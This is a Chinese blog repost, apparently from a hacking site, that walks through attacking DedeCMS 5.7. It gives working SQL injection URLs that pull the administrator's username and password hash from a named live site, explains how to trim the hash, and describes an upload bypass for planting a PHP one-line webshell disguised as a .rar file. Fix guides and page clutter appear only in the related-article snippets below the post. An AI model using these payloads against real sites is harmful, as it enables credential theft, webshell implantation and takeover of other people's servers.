php 5.5.7 漏洞,织梦5.7注入加上传漏洞

最新推荐文章于 2022-09-05 18:22:15 发布
最新推荐文章于 2022-09-05 18:22:15 发布
阅读量280 收藏
点赞数
文章标签: php 5.5.7 漏洞

会员中心查询会员信息语句过滤不严,导致url可提交注入参数;

会员中心有上传动作过滤不严,导致上传漏洞

详细说明:

①注入漏洞。

这站 https://www.webshell.cc/

首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,

然后访问

“/member/ajax_membergroup.php?action=post&membergroup=1”

页面,如图说明存在该漏洞。

然后写上语句

查看管理员帐号

https://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20userid%20from%20`%23@__admin`%20where%201%20or%20id=@`'`

admin www.2cto.com

查看管理员密码

https://www.webshell.cc//member/ajax_membergroup.php?action=post&membergroup=@`'`%20Union%20select%20pwd%20from%20`%23@__admin`%20where%201%20or%20id=@

8d29b1ef9f8c5a5af429

查看管理员密码

得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5

8d2

9b1ef9f8c5a5af42

9

cmd5没解出来 只好测试第二个方法

②上传漏洞:

只要登陆会员中心,然后访问页面链接

“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”

如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”

于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm

https://www.webshell.cc/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post"

enctype="multipart/form-data" name="form1">

file:

newname:

提交

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/3520.html

weixin_39695306
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
织梦DedeCMS select_soft_post.php任意文件上漏洞解决办法
qq_31763129的博客
04-26 6635
最近很多建站朋友发现织梦DedeCMS安装在阿里云服务器后会在阿里云后台提示有一个dedecms任意文件上漏洞,引起的文件是织梦安装目录下的/include/dialog/select_soft_post.php文件。原因是在获取完整文件名的时候没有将会对服务器造成危害的文件格式过滤掉,所以我们需要手动添加代码过滤,具体操作方法如下: 我们找到并打开/include/dialog/select_...
php-5.5.7工具
01-06
php-5.5.7.tar.bz2
php5.4.7 bug,PHP 5.5.7/5.4.23/5.3.28 紧急发布
weixin_35607952的博客
03-09 114
PHP 5.5.7/5.4.23/5.3.28紧急发布.2013-12-13..上个版本是2013-11-14的5.5.6/5.4.22。全部修正了一个 OpenSSL的安全漏洞(CVE-2013-6420)5.3本来已停止常规开发也更新了。 总共修正了10几个Bug(包括Opcache的几个Bug)及安全漏洞。完全改进:Version 5.5.712-Dec-2013Core:Fixed bug...
uploadsafe.php,织梦dedecms上漏洞uploadsafe.inc.php修复
weixin_33213911的博客
03-25 102
织梦dedecms上漏洞uploadsafe.inc.php,这里直接给出修复漏洞的方法,希望大家可以多学习。今天分享的漏洞是一个关于织梦dedecms上漏洞修复方法,主要是文件/include/uploadsafe.inc.php。有2个地方:1、搜索 ${$_key.'_size'} = @filesize($$_key); }(大概在42,43行左右)替换成${$_key.'_...
织梦CMS上漏洞修复
caichuoran3785的博客
06-27 676
近段时间老是发现网站title被注入其他信息,应该是被植入***还是什么的,非常困闹,在网站找了一些织梦漏洞的修补方法。 任意文件上漏洞修复 一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子) $fullfilename = $cfg_basedir.$activepath.'/'.$filename; 修改为 if...
php-5.5.7-nts-Win32-VC11-x64
09-04
标题 "php-5.5.7-nts-Win32-VC11-x64" 指的是 PHP 的一个特定版本,适用于Windows操作系统,具体为64位(x64)架构,编译器为Visual C++ 11(VC11),并且是非线程安全(NTS)版本。这个版本的PHP5.5.7,发布于...
linux php5.5.7 redis 扩展编译源
01-04
linux下为 php5.5.7支持 redis 扩展编译源 生成so文件 /usr/local/php/bin/phpize ./configure --with-php-config=/usr/local/php/bin/php-config make && make install
Adobe Flash Professional CS5.5.7z
03-01
Adobe Flash Professional CS5.5.7z
php-5.5.18.tar.gz
10-18
PHP(Hypertext Preprocessor)是一种广泛使用的开源脚本语言,尤其适合于Web开发,能够嵌入到HTML中。PHP 5.5.18是该语言的一个特定版本,发布于2014年,提供了许多增强功能和修复了之前版本的一些问题。在这个版本...
织梦guestbook.php漏洞,织梦DEDECMS任意文件上漏洞注入漏洞修复方法
weixin_29686935的博客
03-12 736
修复任意文件上漏洞注入漏洞。任意文件上漏洞修复包含一个文件/include/dialog/select_soft_post.php;SQL注入漏洞包含5个文件/include/filter.inc.php /member/mtypes.php /member/pm.php /plus/guestbook/edit.inc.php /plus/search.php。修复方法都是...
dedecms织梦漏洞怎么修复
最新发布
09-05 249
漏洞在 DedeCMS V5.7 SP2正式版(2018-01-09) 已经修复过,已经你的织梦程序已经是这个版本的话,可以忽略以下修复教程,不放心的可以打开文件对比一下。自行采取了底层/框架统一修复、或者使用了其他的修复方案,可能会导致您虽然已经修复了该漏洞,云盾依然报告存在漏洞,遇到该情况可选择忽略该漏洞提示。打开 /include/uploadsafe.inc.php 找到 40至43行。dedecms过滤逻辑不严导致上漏洞。dedecms上漏洞
织梦DedeCMS uploadsafe.inc.php漏洞的解决办法
kakashs
01-19 410
很多将织梦dedecms安装在阿里云的ecs的站长每次都会看到阿里云盾就会通知有一个上漏洞,引起的文件是/include/uploadsafe.inc.php文件, 原因是dedecms原生提供一个"本地变量注册"的模拟实现,原则上允许黑客覆盖任意变量,就会导致被攻击,下面告诉大家解决的办法: 我们找到并打开/include/uploadsafe.inc.php文件,在里面找到如下代码: if(...
织梦cms5.7 后台存在代码执行漏洞
qq_38947035的博客
04-02 1586
漏洞利用: 在本地搭建织梦cms,默认的后台地址为 域名/dede 因为后续的利用需要使用到token,然而登录成功后的数据包内并没有显示token值。所以需要访问如下链接获取token: http://192.168.137.131/dede/tpl.php?action=upload 访问后查看页面源代码,获取到token 然后访问: http://192.168.137.131/dede/...
dedecms 文件上 (CVE-2019-8933)漏洞复现
weixin_42675091的博客
09-03 3381
dedecms 文件上 (CVE-2019-8933)
cve 文件上漏洞php,PHP任意文件上漏洞(CVE-2015-2348)
weixin_39688451的博客
03-25 238
安全研究人员今天发布了一个中危在上文件的时候只判断文件名是合法的文件名就断定这个文件不是恶意文件,这确实会导致其他安全问题。并且在这种情况下,在你自己的文件中检查漏洞很不现实,因为这个漏洞可以绕过你对文件名后缀、文件类型(Content-Type)、Mime type、文件大小等的检查,所以仅仅依靠这些检查是救不了你的。漏洞细节这个漏洞存在于php中一个非常常用的函数中:move_uploade...
120.网络安全渗透测试—[CMS后台 getwebshell]—[织梦dedecms5.7后台 getwebshell]
qwsn
07-10 2801
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! (1)进入后台:模块–>文件管理器---->上文件---->shell.php,内容为 (2)访问:\shell.php(1)进入后台:模块–>文件管理器–>新建文件–>写入wshell.php,内容为 (2)访问:\wshell.php (3)访问:\shell0.php (1)进入后台:系统–>系统基本参数–>核心配置–>专题最大的节点数或FTP端口写入 (2)访问:data\config.cache.inc.php....
织梦dedecms5.5爆最新漏洞,可得到webshell
weixin_33788244的博客
12-03 557
影响版本:Dedecms 5.5漏洞描述:漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。<*参考 by:Flyh4t*...
CVE-2018-20129-——DedeCMS V5.7 SP2前台文件上漏洞
锋刃科技的博客
12-20 5629
0x01 漏洞概述 Desdev DedeCMS(织梦内容管理系统)是中国卓卓网络(Desdev)科技有限公司的一套开源的集内容发布、编辑、管理检索等于一体的PHP网站内容管理系统(CMS)。 Desdev DedeCMS 5.7 SP2版本中的uploads/include/dialog/select_images_post.php文件存在文件上漏洞,远程攻击者可利用该漏洞并执行任意PH...
Windows7下PHP5.4.6开发环境配置全攻略
"这篇文档是PHP5.4.6配置教程,主要针对Windows 7操作系统,结合Apache2.4.3、MySQL5.5.7、phpMyAdmin3.5.2.2和ZF2.0.0进行详细讲解。教程涵盖了如何为不同项目设置虚拟主机,特别为phpMyAdmin配置虚拟主机,以及...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值